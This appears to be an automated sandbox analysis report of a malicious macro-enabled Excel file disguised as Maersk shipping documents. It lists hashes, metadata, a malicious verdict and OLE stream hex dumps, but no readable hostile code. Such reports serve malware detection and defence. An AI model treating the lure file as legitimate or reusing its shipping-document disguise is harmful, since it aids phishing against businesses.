                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:37:28 2024, Security: 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1085440
                                                                                                                                                                                              Entropy (8bit):7.284827444451782
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:dmzHJEHAfwu4hjD3DERnLRmF8DN9rf1I3dWuuvgYmYMyHyj6VOjhDR97jkDyw3WN:kLw/hjbARM8jS3RYUBj6oJ7jkDxWA6
                                                                                                                                                                                              MD5:19F1D1530F0D964BD40272DB37D7A128
                                                                                                                                                                                              SHA1:3A754A27C5A0862D7DB343455113A379046B41ED
                                                                                                                                                                                              SHA-256:DD8FC6CB95E946C0A1F4754F704FAA43CC15E7651DA8D544420C6E576C43EDA1
                                                                                                                                                                                              SHA-512:F6CFD9EC983F0A874565DA99A7D15E16061A29F1C1E2D429C16B6040056E49450892446D106B849A20FBF2E7493AF05633E5B165F0DD2C169905820763614B27
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 09:27:46 2024, Security: 1
                                                                                                                                                                                              Entropy (8bit):7.2635225986061265
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                                              File name:Maersk BL, IN & PL.xls
                                                                                                                                                                                              File size:1'094'656 bytes
                                                                                                                                                                                              MD5:060f7cc392bbfe1f450ea163a727a875
                                                                                                                                                                                              SHA1:ba5a0d8b52ec29b42a4ad9bd8e4f71695e91462c
                                                                                                                                                                                              SHA256:8db643d86e49f12a186bce4de89c247029269bcd9d99ac45dc5535efaa5379b3
                                                                                                                                                                                              SHA512:516c2c50400bbd4e1ac3bb4a8e4741830fb00d64c22aa3a0494c7b42752c4c21649fb6e73bd6ade1bf6923dec09e170a52bdf81f43a91f6abe7f6fac9db021c0
                                                                                                                                                                                              SSDEEP:12288:MmzHJEHAfwu4hmD3DERnLRmF8DzPrf1A3d2FuzEjdXUbBC6wlXbXdiUuMAkw0AFZ:vLw/hmbARM87a3/ET6wBCkw4
                                                                                                                                                                                              TLSH:AF35DF83EA1D4F62CD45423466F7077A1324CC83D522872B22F577283AFBAD06956FAD
                                                                                                                                                                                              File Content Preview:........................>...............................................................................<.......................i.......k......................................................................................................................
                                                                                                                                                                                              Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                                              Number of OLE Files:1
                                                                                                                                                                                              Has Summary Info:
                                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                                              Encrypted Document:True
                                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                                              Contains ObjectPool Stream:False
                                                                                                                                                                                              Flash Objects Count:0
                                                                                                                                                                                              Contains VBA Macros:True
                                                                                                                                                                                              Code Page:1252
                                                                                                                                                                                              Author:
                                                                                                                                                                                              Last Saved By:
                                                                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                                                                              Last Saved Time:2024-10-08 08:27:46
                                                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                                                              Security:1
                                                                                                                                                                                              Document Code Page:1252
                                                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                                                              Contains Dirty Links:False
                                                                                                                                                                                              Shared Document:False
                                                                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                                                                              Application Version:786432
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                                              VBA File Name:Sheet1.cls
                                                                                                                                                                                              Stream Size:977
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) o u . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 29 20 6f 75 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Attribute VB_Name = "Sheet1"
                                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                                                                              Attribute VB_Exposed = True
                                                                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                                                                              

                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                                              VBA File Name:Sheet2.cls
                                                                                                                                                                                              Stream Size:977
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) U . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 29 20 81 55 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Attribute VB_Name = "Sheet2"
                                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                                                                              Attribute VB_Exposed = True
                                                                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                                                                              

                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                                              VBA File Name:Sheet3.cls
                                                                                                                                                                                              Stream Size:977
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) & . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 29 20 e3 26 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Attribute VB_Name = "Sheet3"
                                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                                                                              Attribute VB_Exposed = True
                                                                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                                                                              

                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                                                                                                                              Stream Size:985
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                                                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 29 20 de a7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                                                                              Attribute VB_Exposed = True
                                                                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                                                                              

                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x1CompObj
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:114
                                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:244
                                                                                                                                                                                              Entropy:2.889430592781307
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:200
                                                                                                                                                                                              Entropy:3.2603503175049817
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . - [ . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/\x1CompObj
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:114
                                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/\x5DocumentSummaryInformation
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:244
                                                                                                                                                                                              Entropy:2.701136490257069
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/\x5SummaryInformation
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                                              Stream Size:90976
                                                                                                                                                                                              Entropy:1.885975041684416
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD0018D4CE/\x1Ole
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:20
                                                                                                                                                                                              Entropy:0.5689955935892812
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4
                                                                                                                                                                                              Entropy:0.8112781244591328
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . .
                                                                                                                                                                                              Data Raw:00 00 03 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD0018D4CE/Contents
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                                              Stream Size:197671
                                                                                                                                                                                              Entropy:6.989042939766534
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A52B4/\x1CompObj
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:114
                                                                                                                                                                                              Entropy:4.219515110876372
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A52B4/Package
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                                                              Stream Size:50945
                                                                                                                                                                                              Entropy:7.631071730257267
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A56E1/\x1CompObj
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:114
                                                                                                                                                                                              Entropy:4.219515110876372
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A56E1/Package
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                                                              Stream Size:31124
                                                                                                                                                                                              Entropy:7.746149934092623
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A5E23/\x1CompObj
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:114
                                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A5E23/\x5DocumentSummaryInformation
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
